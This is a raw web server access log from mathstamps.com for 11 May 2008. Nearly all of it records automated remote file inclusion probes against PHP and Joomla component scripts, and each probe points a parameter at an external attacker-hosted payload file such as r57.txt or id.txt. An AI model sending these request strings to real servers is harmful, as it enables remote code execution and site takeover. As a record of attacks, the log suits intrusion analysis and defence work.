216.7.32.9 - - [11/May/2008:18:23:23 -0700] "GET /index3.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:18:23:23 -0700] "GET /logs/index3.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:07 -0700] "GET /logs/access_080407.log//index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:08 -0700] "GET //index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:08 -0700] "GET /logs//index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:09 -0700] "GET /logs/access_080407.log//index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:10 -0700] "GET //index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:10 -0700] "GET /logs//index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:15 -0700] "GET /logs/access_080407.log//index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:15 -0700] "GET //index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:24:16 -0700] "GET /logs//index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:25:46 -0700] "GET //index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:25:46 -0700] "GET //index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:25:50 -0700] "GET //index3.php?pag=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:18:27:27 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:18:29:48 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:18:29:48 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:29:50 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:18:29:53 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:32:28 -0700] "GET /logs/access_080407.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:32:30 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:32:32 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
205.234.213.67 - - [11/May/2008:18:36:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:18:41:54 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
88.84.149.101 - - [11/May/2008:18:41:55 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
85.114.137.165 - - [11/May/2008:18:42:09 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.155.232.37 - - [11/May/2008:18:46:57 -0700] "GET /logs/access_080303.log///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.155.232.37 - - [11/May/2008:18:46:57 -0700] "GET ///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.155.232.37 - - [11/May/2008:18:46:58 -0700] "GET /logs///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
85.114.137.165 - - [11/May/2008:18:47:03 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.137.165 - - [11/May/2008:18:47:04 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.114.137.165 - - [11/May/2008:18:47:04 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.207.204.13 - - [11/May/2008:18:47:25 -0700] "GET /logs/access_080303.log///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.207.204.13 - - [11/May/2008:18:47:25 -0700] "GET ///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.207.204.13 - - [11/May/2008:18:47:25 -0700] "GET /logs///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.155.232.37 - - [11/May/2008:18:47:27 -0700] "GET /logs/access_080303.log///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.155.232.37 - - [11/May/2008:18:47:28 -0700] "GET ///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.155.232.37 - - [11/May/2008:18:47:28 -0700] "GET /logs///update/update5.php?lang=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:53:21 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
85.114.137.165 - - [11/May/2008:18:53:37 -0700] "GET /logs/access_080421.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:54:47 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:18:58:14 -0700] "GET /logs/index2.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:18:58:15 -0700] "GET /index2.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:58:25 -0700] "GET /logs/access_080505.log//ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:58:25 -0700] "GET //ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:58:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:58:47 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.6.22.126 - - [11/May/2008:18:59:06 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.25.186 - - [11/May/2008:18:59:29 -0700] "GET /logs/access_080218.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:01 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:01 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:01 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:01 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:03 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:03 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:06 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:06 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
168.176.162.45 - - [11/May/2008:19:03:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:04:51 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:04:52 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:04:57 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:05:05 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:05:24 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:05:25 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.mathstamps.com"
193.178.228.12 - - [11/May/2008:19:05:28 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
193.178.228.12 - - [11/May/2008:19:05:28 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
216.246.45.242 - - [11/May/2008:19:05:39 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
201.130.79.61 - - [11/May/2008:19:05:48 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
201.130.79.61 - - [11/May/2008:19:05:56 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.246.45.242 - - [11/May/2008:19:05:57 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:06:04 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:19:06:06 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:19:06:06 -0700] "GET //config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:19:06:06 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:06:10 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.108.66.83 - - [11/May/2008:19:06:36 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.mathstamps.com"
89.108.66.83 - - [11/May/2008:19:06:36 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.mathstamps.com"
216.246.45.242 - - [11/May/2008:19:06:48 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
201.130.79.61 - - [11/May/2008:19:06:50 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.246.45.242 - - [11/May/2008:19:06:53 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.45.242 - - [11/May/2008:19:06:58 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:07:24 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:07:36 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:07:36 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:07:36 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.45.242 - - [11/May/2008:19:07:56 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:08:32 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
201.130.79.61 - - [11/May/2008:19:08:38 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
201.130.79.61 - - [11/May/2008:19:08:41 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.55.148.27 - - [11/May/2008:19:08:50 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
201.130.79.61 - - [11/May/2008:19:09:13 -0700] "GET //index.php?option=com_content&task=multithumb§ionid=multithumb.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:19:10:42 -0700] "GET /index3.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:19:10:45 -0700] "GET /logs/index3.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:11:17 -0700] "GET /logs/access_080331.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:11:17 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
209.62.115.202 - - [11/May/2008:19:11:17 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.boxlotto.com/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:12:38 -0700] "GET /logs/access_080331.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:12:38 -0700] "GET /logs/access_080331.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:12:39 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:12:39 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:12:39 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
217.16.26.124 - - [11/May/2008:19:12:39 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
193.178.228.12 - - [11/May/2008:19:12:56 -0700] "GET /logs/access_080331.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [11/May/2008:19:12:57 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [11/May/2008:19:12:57 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.108.66.83 - - [11/May/2008:19:15:44 -0700] "GET /logs/access_080331.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.83 - - [11/May/2008:19:15:44 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.83 - - [11/May/2008:19:15:45 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.118.117.79 - - [11/May/2008:19:16:47 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://haddembr.site88.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
216.118.117.79 - - [11/May/2008:19:16:47 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://haddembr.site88.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.mathstamps.com"
